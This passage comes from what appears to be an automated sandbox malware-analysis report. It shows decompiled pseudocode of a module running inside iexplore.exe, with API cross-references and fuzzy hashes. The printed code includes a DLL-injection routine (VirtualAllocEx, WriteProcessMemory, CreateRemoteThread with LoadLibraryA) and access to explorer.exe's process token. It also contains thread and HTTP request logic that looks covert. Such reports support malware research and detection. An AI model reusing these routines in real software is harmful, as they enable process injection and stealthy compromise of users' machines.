					_t28 = 0x30;
					 *_t19 = _t28;
				}
				 *(_t33 - 4) = 0;
				wsprintfA(_t33 - 0x9c, "Content-Length: %d\r\n%s: %s\r\n",  *(_t33 + 0x10), "TagId", _t19);
				 *((intOrPtr*)(_t32 + 0x3c70))( *(_t32 + 0x3c60), _t33 - 0x9c, 0xffffffff, 0xa0000000);
				_t24 = HttpSendRequestA( *(_t32 + 0x3c60), 0, 0,  *(_t33 + 0xc),  *(_t33 + 0x10));
				 *(_t33 - 0x1c) = _t24;
				if(_t24 == 0) {
					 *(_t32 + 0x5c) =  *(_t32 + 0x5c) & 0x000000fb;
				}
				 *(_t33 - 4) =  *(_t33 - 4) | 0xffffffff;
				return E72B2159C(_t24, _t29);
			}

0x72b2294c
0x72b2294c
0x72b22951
0x72b22956
0x72b2295b
0x72b2295e
0x72b22968
0x72b2296c
0x72b2296d
0x72b2296d
0x72b22970
0x72b22988
0x72b229a5
0x72b229b9
0x72b229bf
0x72b229c4
0x72b229c6
0x72b229c6
0x72b229d8
0x72b229e1

APIs

wsprintfA.USER32 ref: 72B22988
HttpSendRequestA.WININET(?,00000000,00000000,?,?), ref: 72B229B9

Strings

TagId, xrefs: 72B22974
Content-Length: %d%s: %s, xrefs: 72B2297C

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: HttpRequestSendwsprintf
String ID: Content-Length: %d%s: %s$TagId
API String ID: 2076034926-1589559193
Opcode ID: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
Instruction ID: 2e58099248e1f5e2e9d4c2e7d97d0df0c294e3bc8f827e7bb89a638015fdf798
Opcode Fuzzy Hash: 1f0392a83556ce175696367e57bada25f7a316907c1632c483e3097c36dedfd6
Instruction Fuzzy Hash: FA019271414359EFEB129F78CC44E9ABBB8BF04315F104658F9AAF6092D7305A50DF10

Uniqueness

Uniqueness Score: -1.00%

Function 72B22EA1, Relevance: 6.1, APIs: 4, Instructions: 70
threadsynchronizationwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B22EA1(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t5;
				void* _t6;
				intOrPtr _t8;
				char* _t9;
				void* _t23;
				intOrPtr _t24;
				intOrPtr _t25;

				_t23 =  *0x72b260a8; // 0x100
				if(_t23 == 0) {
					L5:
					__eflags =  *0x72b26088; // 0x0
					if(__eflags != 0) {
						L10:
						_t6 = 0;
					} else {
						E72B237BE(_t5, __eflags, 0x72b2603c,  *0x72b260a0);
						__eflags =  *0x72b2605f; // 0x1
						if(__eflags == 0) {
							 *0x72b260b8 = 0;
						}
						__eflags =  *0x72b260b8; // 0x1
						if(__eflags != 0) {
							L12:
							 *0x72b26030 = 0x72b2603c; // executed
							_t6 = CreateThread(0, 0, E72B23132, 0, 0, 0x72b26148); // executed
							 *0x72b260a8 = _t6;
						} else {
							 *0x72b26034 =  *0x72b26034 + 1;
							_t8 =  *0x72b26034; // 0x0
							__eflags = _t8 - _a4;
							if(__eflags < 0) {
								_t9 =  *0x72b260a0; // 0x72b27226
								 *_t9 = 0;
								E72B237BE(_t9, __eflags, 0x72b2603c,  *0x72b260a0);
								 *0x72b2605f = 1;
								 *0x72b260b8 = 1;
								goto L12;
							} else {
								goto L10;
							}
						}
					}
				} else {
					PostThreadMessageA( *0x72b26148, 0x12, 0, 0);
					WaitForSingleObject( *0x72b260a8, 0x7530);
					CloseHandle( *0x72b260a8);
					 *0x72b260a8 = 0;
					_t5 =  *((intOrPtr*)(E72B23C14(0x1e, 0,  &_v8)));
					_t24 =  *0x72b2602c; // 0x0
					if(_t24 != 0) {
						L3:
						if((_t5 & 0x00000004) == 0) {
							goto L5;
						} else {
							_t6 = 0;
						}
					} else {
						_t25 =  *0x72b260b8; // 0x1
						if(_t25 == 0) {
							goto L5;
						} else {
							goto L3;
						}
					}
				}
				return _t6;
			}

0x72b22ea8
0x72b22eae
0x72b22f0c
0x72b22f0d
0x72b22f13
0x72b22f4c
0x72b22f4c
0x72b22f15
0x72b22f21
0x72b22f26
0x72b22f2c
0x72b22f2e
0x72b22f2e
0x72b22f34
0x72b22f3a
0x72b22f71
0x72b22f7f
0x72b22f85
0x72b22f8b
0x72b22f3c
0x72b22f3c
0x72b22f42
0x72b22f47
0x72b22f4a
0x72b22f50
0x72b22f55
0x72b22f5e
0x72b22f63
0x72b22f6a
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22f4a
0x72b22f3a
0x72b22eb0
0x72b22eba
0x72b22ecb
0x72b22ed7
0x72b22ee4
0x72b22eef
0x72b22ef1
0x72b22ef7
0x72b22f01
0x72b22f03
0x00000000
0x72b22f05
0x72b22f05
0x72b22f05
0x72b22ef9
0x72b22ef9
0x72b22eff
0x00000000
0x00000000
0x00000000
0x00000000
0x72b22eff
0x72b22ef7
0x72b22f93

APIs

PostThreadMessageA.USER32 ref: 72B22EBA
WaitForSingleObject.KERNEL32(00007530), ref: 72B22ECB
CloseHandle.KERNEL32 ref: 72B22ED7
CreateThread.KERNEL32(00000000,00000000,Function_00003132,00000000,00000000,72B26148), ref: 72B22F85

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Thread$CloseCreateHandleMessageObjectPostSingleWait
String ID:
API String ID: 3204264564-0
Opcode ID: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
Instruction ID: 55e1e3665506082e23fab281f5e934d135a5a335b73c88e28fd5a4c76e9a1134
Opcode Fuzzy Hash: 5c150527a3dcd8632fa4d2c8eb45422c0a244393909aa92e597cd2ea823468ca
Instruction Fuzzy Hash: 5021A7724853C4BFEB22D726C8C0B473FE9E70D2C6722081CE54AC7117D3210899E755

Uniqueness

Uniqueness Score: -1.00%

Function 72B22429, Relevance: 4.6, APIs: 3, Instructions: 50
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E72B22429(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t16;
				signed int _t20;
				void* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t35;

				_t28 = _a4;
				_t3 = _t28 + 0x1b48; // 0x98e9
				_t35 =  *_t3 + 0x78;
				_t32 = 1;
				_t16 = _a8;
				if(_t16 == 0) {
					_t35 = _t28;
					L5:
					_t5 = _t28 + 0x1b40; // 0xfc4ce856
					SetEvent( *_t5);
					L6:
					if(( *(_t35 + 0x1b44) & 0x00000004) != 0) {
						_t9 = _t35 + 0x20; // 0x9891
						_t33 = _t9;
						E72B21A7E(_t35);
						_t10 = _t28 + 0x1b40; // 0x72b23369
						_t11 = _t28 + 0x1b48; // 0x98e9
						 *_t33 = _t10 -  *_t11;
						 *((intOrPtr*)(_t33 + 4)) = 0x14;
						_t13 = _t28 + 0x1b40; // 0xfc4ce856
						_t20 = WaitForSingleObject( *_t13, 0);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t33 + 8)) =  ~_t20 + 1;
						_t23 = E72B2253C(_t10 -  *_t11,  ~_t20 + 1, _t33); // executed
						_t32 = _t23;
						E72B215AD(_t35);
					}
					return _t32;
				}
				_t25 = _t16 - 1;
				if(_t25 == 0) {
					goto L5;
				}
				if(_t25 == 1) {
					_t4 = _t28 + 0x1b40; // 0xfc4ce856
					ResetEvent( *_t4);
				}
				goto L6;
			}

0x72b22430
0x72b22434
0x72b2243d
0x72b22440
0x72b22441
0x72b22444
0x72b2245a
0x72b2245c
0x72b2245c
0x72b22462
0x72b22468
0x72b2246f
0x72b22472
0x72b22472
0x72b22475
0x72b2247a
0x72b22480
0x72b22488
0x72b2248a
0x72b22491
0x72b22497
0x72b2249f
0x72b224a3
0x72b224a6
0x72b224ac
0x72b224ae
0x72b224ae
0x72b224b9
0x72b224b9
0x72b22446
0x72b22447
0x00000000
0x00000000
0x72b2244a
0x72b2244c
0x72b22452
0x72b22452
0x00000000

APIs

ResetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22452
SetEvent.KERNEL32(FC4CE856,00000000,?,?,?,72B220B9,?,00000000,?,?,72B21829,00000001,?,?,00000000,00000002), ref: 72B22462
WaitForSingleObject.KERNEL32(FC4CE856,00000000,72B21829), ref: 72B22497

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Event$ObjectResetSingleWait
String ID:
API String ID: 463700304-0
Opcode ID: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
Instruction ID: 489b9761182771e32d3c2f36c9c0cf2ae3132ab2c47af561efee3482e56b6e31
Opcode Fuzzy Hash: b076a45a44b05ff2950e3405ec3ac076df081c87bdc46bd345c917783711913f
Instruction Fuzzy Hash: D90169361203049BCB006F69CC54AD6BBE8FF94746F198079EE5EDB157EB309814CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B21829, Relevance: 3.1, APIs: 2, Instructions: 102
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E72B21829(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t52;
				void* _t53;
				void* _t58;
				void* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t66;
				intOrPtr _t68;
				void* _t72;
				void* _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t86;

				_t80 = __edx;
				_push(0x20);
				_push(0x72b253f8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
				_t82 =  *((intOrPtr*)(_t86 + 8));
				_t85 =  *((intOrPtr*)(_t82 + 0x1b48)) + 0x1bc8;
				 *((intOrPtr*)(_t86 - 0x24)) =  *((intOrPtr*)(_t82 + 0x1b14));
				if(( *(_t82 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t85 + 0x1b40), 0xffffffff);
				}
				 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
				while(( *(_t85 + 0x1b44) & 0x00000001) != 0 && ( *(_t82 + 0x1b44) & 0x00000001) != 0) {
					 *(_t86 - 0x20) =  *(_t86 - 0x20) + 1;
					_t52 =  *(_t86 - 0x20);
					if(_t52 == 0) {
						 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						continue;
					}
					_t53 = _t52 - 1;
					if(_t53 == 0) {
						__eflags =  *((intOrPtr*)(_t86 - 0x2c)) - 0xd80;
						if(__eflags > 0) {
							 *((intOrPtr*)(_t86 - 0x2c)) = 0xd80;
						}
						E72B229E4(0xd80, _t80, _t82, _t85, __eflags,  *((intOrPtr*)(_t82 + 0x1b48)), _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x2c)), _t86 - 0x1c);
						__eflags =  *((intOrPtr*)(_t86 - 0x1c));
						L23:
						if(__eflags == 0) {
							E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
						}
						continue;
					}
					_t58 = _t53 - 1;
					if(_t58 == 0) {
						_t60 = 0xd80 -  *((intOrPtr*)(_t82 + 8));
						__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
						if( *((intOrPtr*)(_t86 - 0x1c)) > _t60) {
							_t78 =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							__eflags =  *((intOrPtr*)(_t86 - 0x1c)) - _t60;
							E72B215CC(_t82,  *((intOrPtr*)(_t86 - 0x1c)) - _t60, _t82, 0,  *((intOrPtr*)(_t86 - 0x1c)) - _t60);
						}
						_t62 = E72B2162F(0xd80, _t78, _t82, _t82 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
						__eflags = _t62;
						goto L23;
					}
					_t64 = _t58 - 1;
					if(_t64 == 0) {
						WaitForSingleObject( *(_t85 + 0x1b10), 0xffffffff);
						continue;
					}
					_t66 = _t64 - 1;
					if(_t66 == 0) {
						_t68 = E72B215CC(_t82, __eflags, _t85, _t85 + 0xd8c, 0xd80);
						 *((intOrPtr*)(_t86 - 0x1c)) = _t68;
						__eflags = _t68;
						if(__eflags != 0) {
							continue;
						}
						L15:
						 *(_t86 - 0x20) =  *(_t86 - 0x20) & 0x00000000;
						continue;
					}
					_t97 = _t66 != 1;
					if(_t66 != 1) {
						continue;
					}
					E72B22429(_t85, 2); // executed
					_t72 = E72B2294C(0xd80, _t80, _t85, _t97,  *((intOrPtr*)(_t85 + 0x1b48)), _t85 + 0xd8c,  *((intOrPtr*)(_t86 - 0x1c))); // executed
					if(_t72 == 0) {
						E72B2210C( *((intOrPtr*)(_t86 - 0x24)));
					}
					E72B22429(_t85, 1); // executed
					goto L15;
				}
				 *(_t86 - 4) =  *(_t86 - 4) | 0xffffffff;
				__eflags = 0;
				return E72B2159C(0, _t80);
			}

0x72b21829
0x72b21829
0x72b2182b
0x72b21830
0x72b21835
0x72b21839
0x72b21842
0x72b2184e
0x72b21858
0x72b21862
0x72b21862
0x72b21868
0x72b21871
0x72b2188e
0x72b21891
0x72b21894
0x72b21979
0x00000000
0x72b21979
0x72b2189a
0x72b2189b
0x72b21941
0x72b21944
0x72b21946
0x72b21946
0x72b2195d
0x72b21962
0x72b21966
0x72b21966
0x72b2196f
0x72b2196f
0x00000000
0x72b21966
0x72b218a1
0x72b218a2
0x72b21917
0x72b2191a
0x72b2191d
0x72b21922
0x72b21922
0x72b21928
0x72b21928
0x72b21938
0x72b2193d
0x00000000
0x72b2193d
0x72b218a4
0x72b218a5
0x72b2190a
0x00000000
0x72b2190a
0x72b218a7
0x72b218a8
0x72b218e9
0x72b218ee
0x72b218f1
0x72b218f3
0x00000000
0x00000000
0x72b218f9
0x72b218f9
0x00000000
0x72b218f9
0x72b218aa
0x72b218ab
0x00000000
0x00000000
0x72b218b0
0x72b218c5
0x72b218cc
0x72b218d1
0x72b218d1
0x72b218d9
0x00000000
0x72b218d9
0x72b219bc
0x72b219c0
0x72b219c7

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B21862
WaitForSingleObject.KERNEL32(?,000000FF), ref: 72B2190A

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: ObjectSingleWait
String ID:
API String ID: 24740636-0
Opcode ID: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
Instruction ID: 1cd3c94c938bd48e2da1cd979ccb837cf298ca92addc6a0b682ed9aa0d1bd90e
Opcode Fuzzy Hash: 6f89b8e4e7d24eea5171e94811583e31212ca73a2607e56a9dd449ed73a44601
Instruction Fuzzy Hash: 6E41557492070AABDF168BBCCC40BEDBAF8FF44316F009125E92EB5196E7346552CB64

Uniqueness

Uniqueness Score: -1.00%

Function 72B2162F, Relevance: 1.6, APIs: 1, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B2162F(void* __ebx, void* __ecx, signed int _a4, signed int _a8, intOrPtr _a12) {
				signed int _t38;
				signed int _t40;
				signed int* _t51;

				_t51 = _a4;
				_t52 = _t51[0x6d1] & 0x00000004;
				if((_t51[0x6d1] & 0x00000004) == 0) {
					E72B21A7E(_t51);
					_a4 = _a4 & 0x00000000;
					__eflags = _t51[2] - 0xd80;
					if(_t51[2] < 0xd80) {
						_t40 = _a8;
						while(1) {
							__eflags = _a4 - _a12;
							if(_a4 >= _a12) {
								break;
							}
							__eflags = _t40;
							if(_t40 != 0) {
								 *((char*)( &(_t51[3]) +  *_t51)) =  *_t40;
								_t40 = _t40 + 1;
								__eflags = _t40;
							}
							_t21 = _t51[2] + 1; // 0x1
							_t51[2] = _t21;
							 *_t51 = ( *_t51 + 1) % 0xd80;
							__eflags = _t51[2];
							if(_t51[2] == 0) {
								SetEvent(_t51[0x6c4]);
							}
							_a4 = _a4 + 1;
							__eflags = _t51[2] - 0xd80;
							if(_t51[2] < 0xd80) {
								continue;
							}
							break;
						}
					}
					E72B215AD(_t51);
				} else {
					_t38 = E72B2278E(__ecx, _t52, _t51, _a8, _a12); // executed
					_a4 = _t38;
				}
				return _a4;
			}

0x72b21633
0x72b21636
0x72b2163d
0x72b21652
0x72b21657
0x72b21660
0x72b21663
0x72b21666
0x72b21669
0x72b2166c
0x72b2166f
0x00000000
0x00000000
0x72b21671
0x72b21673
0x72b21679
0x72b2167d
0x72b2167d
0x72b2167d
0x72b2168a
0x72b2168d
0x72b21690
0x72b21692
0x72b21694
0x72b2169c
0x72b2169c
0x72b216a2
0x72b216a5
0x72b216a8
0x00000000
0x00000000
0x00000000
0x72b216a8
0x72b216aa
0x72b216ac
0x72b2163f
0x72b21646
0x72b2164b
0x72b2164b
0x72b216b7

APIs

SetEvent.KERNEL32(?,00000000,?,?), ref: 72B2169C

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
Instruction ID: cac046f5e760f0a29d4f7e5bf99a1d4e3a1b154928ebae07cd67838b8cd1f331
Opcode Fuzzy Hash: aa518ea17f52b92e445a0360ba050068f0f46623d0a655a4edf19cff0dc9ddbb
Instruction Fuzzy Hash: C9114F31610745AFC722CF59C890A8ABBE5EF95351B14D81EE85E87212D731A981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 72B21C2C, Relevance: 1.5, APIs: 1, Instructions: 6
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E72B21C2C(intOrPtr _a4) {
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;

				E72B21F95(_t3, _t4, _t5, _t6, _t7, _t8, _a4); // executed
				ExitThread(0);
			}

0x72b21c32
0x72b21c39

APIs

Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F4,72B253A8,000006C0,72B21D08,00000000), ref: 72B21FB7
Part of subcall function 72B21F95: GetStdHandle.KERNEL32(000000F6,000000FF,?,?,?,?,0000032E,?,00000000,0000032E), ref: 72B22033
Part of subcall function 72B21F95: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,?,00000004,?), ref: 72B2205F
Part of subcall function 72B21F95: ResumeThread.KERNEL32(00000000,?,?,72B21829,00000001,?,?,00000000,00000002,000000FF,?,?,?,?,0000032E,?), ref: 72B220C1
Part of subcall function 72B21F95: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 72B220D0
Part of subcall function 72B21F95: CloseHandle.KERNEL32(00000000), ref: 72B220D9

ExitThread.KERNEL32 ref: 72B21C39

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: HandleThread$CloseCreateExitMultipleObjectsRemoteResumeWait
String ID:
API String ID: 3079971139-0
Opcode ID: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
Instruction ID: 8207a6a918aad3a41bed777c7a348672e9e46877dcf1a2a6b4e42e1e27abc60a
Opcode Fuzzy Hash: 13a744b9dc27f918067d674f95bd2fbcceb96cfaed7602e2083019f0078df6d6
Instruction Fuzzy Hash: 4AB0127005830CBBC6003F56CC09B093E9ADB40782F009014F50C190639B61550145A2

Uniqueness

Uniqueness Score: -1.00%

Function 72B22414, Relevance: 1.5, APIs: 1, Instructions: 5
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22414() {
				void* _t7;

				 *(_t7 - 0x1c) =  *(_t7 - 0x1c) & 0x00000000;
				 *(_t7 - 4) =  *(_t7 - 4) | 0xffffffff;
				ExitThread( *(_t7 - 0x1c));
			}

0x72b22417
0x72b2241b
0x72b22422

APIs

ExitThread.KERNEL32 ref: 72B22422

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: ExitThread
String ID:
API String ID: 2158977761-0
Opcode ID: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
Instruction ID: 483b617358438d905fdb998ea22e0a77d6154b95692ace215674c7f6aa0f4695
Opcode Fuzzy Hash: 1e6976981a38066e4e8df456abda2e4b1028b09f249d7f2710593fe4701e50f5
Instruction Fuzzy Hash: 5AC04C31C1030ADBCF118B91C90A3AEBB71EB00321F2083489431720E5C73406229F51

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 72B22123, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 94
libraryloadermemoryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E72B22123(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t34;
				void* _t35;
				intOrPtr _t37;
				struct HINSTANCE__* _t45;
				void* _t46;
				void* _t49;
				long _t51;
				void* _t56;
				void* _t57;
				void* _t58;

				_t49 = __edx;
				_push(0x20);
				_push(0x72b253b8);
				E72B24A94(__ebx, __edi, __esi);
				 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
				_t51 = 0x10000;
				 *(_t58 - 0x24) =  *(_t58 - 0x24) & 0x00000000;
				_t45 = LoadLibraryA("ntdll.dll");
				 *(_t58 - 0x20) = _t45;
				if(_t45 == 0) {
					L17:
					if( *(_t58 - 0x20) != 0) {
						FreeLibrary( *(_t58 - 0x20));
					}
					if( *(_t58 - 0x1c) != 0) {
						LocalFree( *(_t58 - 0x1c));
					}
					return E72B2159C( *(_t58 - 0x24), _t49);
				}
				_t33 = GetProcAddress(_t45, "NtQuerySystemInformation");
				 *(_t58 - 0x28) = _t33;
				if(_t33 == 0) {
					goto L17;
				}
				_t34 = GetProcAddress(_t45, "_wcsicmp");
				 *(_t58 - 0x2c) = _t34;
				if(_t34 == 0) {
					goto L17;
				}
				while(1) {
					_t35 = LocalAlloc(0x40, _t51);
					 *(_t58 - 0x1c) = _t35;
					if(_t35 == 0) {
						goto L17;
					}
					_t46 =  *(_t58 - 0x28)(5, _t35, _t51, 0);
					if(_t46 != 0xc0000004) {
						if(_t46 < 0) {
							goto L17;
						}
						L8:
						if(_t46 == 0xc0000004) {
							continue;
						}
						_t56 =  *(_t58 - 0x1c);
						 *(_t58 - 4) = 0;
						while(1) {
							_t37 =  *((intOrPtr*)(_t56 + 0x3c));
							if(_t37 == 0) {
								goto L14;
							}
							_push(L"explorer.exe");
							_push(_t37);
							if( *(_t58 - 0x2c)() != 0) {
								goto L14;
							}
							_t57 = OpenProcess(0x410, 0,  *(_t56 + 0x44));
							if(_t57 != 0) {
								OpenProcessToken(_t57, 0x200ff, _t58 - 0x24);
								CloseHandle(_t57);
							}
							L16:
							 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
							goto L17;
							L14:
							if( *_t56 == 0) {
								goto L16;
							}
							_t56 = _t56 +  *_t56;
							 *(_t58 - 0x30) = _t56;
						}
					}
					LocalFree( *(_t58 - 0x1c));
					 *(_t58 - 0x1c) =  *(_t58 - 0x1c) & 0x00000000;
					_t51 = _t51 + _t51;
					goto L8;
				}
				goto L17;
			}

APIs

LoadLibraryA.KERNEL32(ntdll.dll,72B253B8), ref: 72B22141
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 72B22160
GetProcAddress.KERNEL32(00000000,_wcsicmp), ref: 72B22173
LocalAlloc.KERNEL32(00000040,00010000), ref: 72B22188
LocalFree.KERNEL32(00000000), ref: 72B221AB
OpenProcess.KERNEL32(00000410,00000000,?), ref: 72B221E8
OpenProcessToken.ADVAPI32(00000000,000200FF,?), ref: 72B221FE
CloseHandle.KERNEL32(00000000), ref: 72B22205
FreeLibrary.KERNEL32(00000000), ref: 72B2222C
LocalFree.KERNEL32(00000000), ref: 72B2223B

Strings

explorer.exe, xrefs: 72B221D0
_wcsicmp, xrefs: 72B2216D
NtQuerySystemInformation, xrefs: 72B22154
ntdll.dll, xrefs: 72B2213C

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: FreeLocal$AddressLibraryOpenProcProcess$AllocCloseHandleLoadToken
String ID: NtQuerySystemInformation$_wcsicmp$explorer.exe$ntdll.dll
API String ID: 3808024924-2858649656
Opcode ID: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
Instruction ID: 2cd11ee1f3bcf27d2bb61f551ead356f26b6ede089a07f4ab670a0598fbe968c
Opcode Fuzzy Hash: 1214e861dfd24a073f152453c9708aab208a02f4c40c9a4fba5c7a5505168f17
Instruction Fuzzy Hash: C831C332D503169FDB128FA9CD48B9EB6F4EF88317F210529E65AF6146DB764840CF50

Uniqueness

Uniqueness Score: -1.00%

Function 72B227D2, Relevance: 6.0, APIs: 4, Instructions: 48
memorystringinjectionCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E72B227D2(void* __ecx, void* _a4, void* _a8, intOrPtr _a12) {
				signed int _v8;
				void* _t18;
				void* _t22;

				_t20 = __ecx;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t18 = _a8;
				_t22 = VirtualAllocEx(_t18, 0, 0x1000, 0x1000, 4);
				if(_t22 != 0) {
					if(WriteProcessMemory(_t18, _t22, _a4, lstrlenA(_a4) + 1, 0) != 0) {
						E72B224BC(_t20, _t18, __imp__LoadLibraryA, _t22, _a12,  &_v8, 1);
					}
					VirtualFreeEx(_t18, _t22, 0x1000, 0x8000);
				}
				return _v8;
			}

0x72b227d2
0x72b227d5
0x72b227d6
0x72b227db
0x72b227f2
0x72b227f6
0x72b22812
0x72b22825
0x72b22825
0x72b22832
0x72b22832
0x72b2283f

APIs

VirtualAllocEx.KERNEL32(?,00000000,00001000,00001000,00000004), ref: 72B227EC
lstrlenA.KERNEL32(?,00000000), ref: 72B227FD
WriteProcessMemory.KERNEL32(?,00000000,?,00000001), ref: 72B2280A
VirtualFreeEx.KERNEL32(?,00000000,00001000,00008000), ref: 72B22832

Part of subcall function 72B224BC: CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000000,00000000), ref: 72B224E1
Part of subcall function 72B224BC: CloseHandle.KERNEL32(?), ref: 72B22523

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

